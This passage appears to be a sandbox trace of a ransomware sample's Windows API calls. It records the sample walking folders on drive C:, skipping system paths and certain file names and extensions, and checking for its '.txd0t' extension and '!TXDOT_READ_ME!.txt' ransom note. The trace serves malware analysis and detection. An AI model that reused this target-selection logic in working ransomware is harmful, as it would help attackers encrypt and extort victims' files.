| out: hFindFile=0xec27b0) returned 1 [0070.824] GetProcessHeap () returned 0xe30000 [0070.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7308 | out: hHeap=0xe30000) returned 1 [0070.824] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0070.824] FindClose (in: hFindFile=0xec21f0 | out: hFindFile=0xec21f0) returned 1 [0070.824] GetProcessHeap () returned 0xe30000 [0070.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec5e58 | out: hHeap=0xe30000) returned 1 [0070.824] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0070.824] StrCmpW (psz1="$Recycle.Bin", psz2=".") returned -1 [0070.824] StrCmpW (psz1="$Recycle.Bin", psz2="..") returned -1 [0070.824] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0070.824] StrCmpW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=".") returned -1 [0070.824] StrCmpW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="..") returned -1 [0070.824] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0070.824] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0070.824] StrNCatW (in: psz1="C:\\", psz2="$WINRE_BACKUP_PARTITION.MARKER", cchMax=1030 | out: psz1="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned="C:\\$WINRE_BACKUP_PARTITION.MARKER" [0070.824] PathFindExtensionW (pszPath="$WINRE_BACKUP_PARTITION.MARKER") returned=".MARKER" [0070.824] StrCmpW (psz1=".MARKER", psz2=".txd0t") returned -1 [0070.824] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="bootsect.bak") returned -1 [0070.824] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="iconcache.db") returned -1 [0070.824] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="thumbs.db") returned -1 [0070.824] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=" ransomware ") returned 1 [0070.824] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=" ransom ") returned 1 [0070.824] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="debug.txt") returned -1 [0070.824] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="boot.ini") returned -1 [0070.824] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="desktop.ini") returned -1 [0070.824] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="autorun.inf") returned -1 [0070.824] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntuser.dat") returned -1 [0070.825] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntldr") returned -1 [0070.825] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntdetect.com") returned -1 [0070.825] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="bootfont.bin") returned -1 [0070.825] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.825] PathFindExtensionW (pszPath="$WINRE_BACKUP_PARTITION.MARKER") returned=".MARKER" [0070.825] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".MARKER") returned 0x0 [0070.825] FileTimeToSystemTime (in: lpFileTime=0x552fc5c, lpSystemTime=0x552fc48 | out: lpSystemTime=0x552fc48) returned 1 [0070.825] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552fc48, lpLocalTime=0x552fc18 | out: lpLocalTime=0x552fc18) returned 1 [0070.825] FileTimeToSystemTime (in: lpFileTime=0x552fc64, lpSystemTime=0x552fc28 | out: lpSystemTime=0x552fc28) returned 1 [0070.825] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552fc28, lpLocalTime=0x552fc38 | out: lpLocalTime=0x552fc38) returned 1 [0070.825] FileTimeToSystemTime (in: lpFileTime=0x552fc6c, lpSystemTime=0x552fbf0 | out: lpSystemTime=0x552fbf0) returned 1 [0070.825] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552fbf0, lpLocalTime=0x552fbe0 | out: lpLocalTime=0x552fbe0) returned 1 [0070.825] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0070.825] StrCmpW (psz1="588bce7c90097ed212", psz2=".") returned 1 [0070.825] StrCmpW (psz1="588bce7c90097ed212", psz2="..") returned 1 [0070.825] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0070.825] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0070.825] StrNCatW (in: psz1="C:\\", psz2="588bce7c90097ed212", cchMax=1030 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\system32\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\syswow64\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\system\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\windows\\winsxs\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\roaming\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\local\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\appdata\\locallow\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\all users\\microsoft\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="\\inetpub\\logs\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\boot\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\perflogs\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\programdata\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\drivers\\") returned 0x0 [0070.825] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\wsus\\") returned 0x0 [0070.826] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\efstmpwp\\") returned 0x0 [0070.826] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch=":\\$recycle.bin\\") returned 0x0 [0070.826] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="crypt_detect") returned 0x0 [0070.826] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="cryptolocker") returned 0x0 [0070.826] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="ransomware") returned 0x0 [0070.826] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\WINDOWS") returned 0x0 [0070.826] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\Program Files (x86)") returned 0x0 [0070.826] StrStrIW (lpFirst="C:\\588bce7c90097ed212", lpSrch="C:\\Program Files") returned 0x0 [0070.826] GetProcessHeap () returned 0xe30000 [0070.826] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xec6e60 [0070.826] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0070.826] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\*", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\*") returned="C:\\588bce7c90097ed212\\*" [0070.826] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0070.865] StrCmpW (psz1=".", psz2=".") returned 0 [0070.865] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.866] StrCmpW (psz1="..", psz2=".") returned 1 [0070.866] StrCmpW (psz1="..", psz2="..") returned 0 [0070.866] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1025", cAlternateFileName="")) returned 1 [0070.866] StrCmpW (psz1="1025", psz2=".") returned 1 [0070.866] StrCmpW (psz1="1025", psz2="..") returned 1 [0070.866] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0070.866] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0070.866] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1025", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0070.866] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\system32\\") returned 0x0 [0070.866] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\syswow64\\") returned 0x0 [0070.866] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\system\\") returned 0x0 [0070.866] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\windows\\winsxs\\") returned 0x0 [0070.866] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\roaming\\") returned 0x0 [0070.866] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\local\\") returned 0x0 [0070.866] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\appdata\\locallow\\") returned 0x0 [0070.866] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\all users\\microsoft\\") returned 0x0 [0070.866] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="\\inetpub\\logs\\") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\boot\\") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\perflogs\\") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\programdata\\") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\drivers\\") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\wsus\\") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\efstmpwp\\") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch=":\\$recycle.bin\\") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="crypt_detect") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="cryptolocker") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="ransomware") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\WINDOWS") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\Program Files (x86)") returned 0x0 [0070.867] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1025", lpSrch="C:\\Program Files") returned 0x0 [0070.867] GetProcessHeap () returned 0xe30000 [0070.867] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0070.867] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0070.867] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\*") returned="C:\\588bce7c90097ed212\\1025\\*" [0070.867] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25b0 [0070.868] StrCmpW (psz1=".", psz2=".") returned 0 [0070.868] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.868] StrCmpW (psz1="..", psz2=".") returned 1 [0070.869] StrCmpW (psz1="..", psz2="..") returned 0 [0070.869] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0070.869] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0070.869] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0070.869] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0070.869] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0070.869] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned="C:\\588bce7c90097ed212\\1025\\eula.rtf" [0070.869] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0070.869] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0070.869] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.869] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0070.869] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0070.869] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0070.869] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0070.871] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0070.871] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0070.871] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0070.871] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0070.871] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0070.871] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0070.871] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0070.871] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0070.871] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0070.871] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" [0070.872] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0070.872] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0070.872] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.872] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0070.872] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0070.872] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0070.872] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0070.872] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0070.872] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0070.872] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0070.872] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0070.872] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0070.872] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0070.872] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0070.872] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1025", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025") returned="C:\\588bce7c90097ed212\\1025" [0070.872] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\") returned="C:\\588bce7c90097ed212\\1025\\" [0070.872] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1025\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" [0070.872] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0070.872] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0070.872] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0070.873] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.873] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" 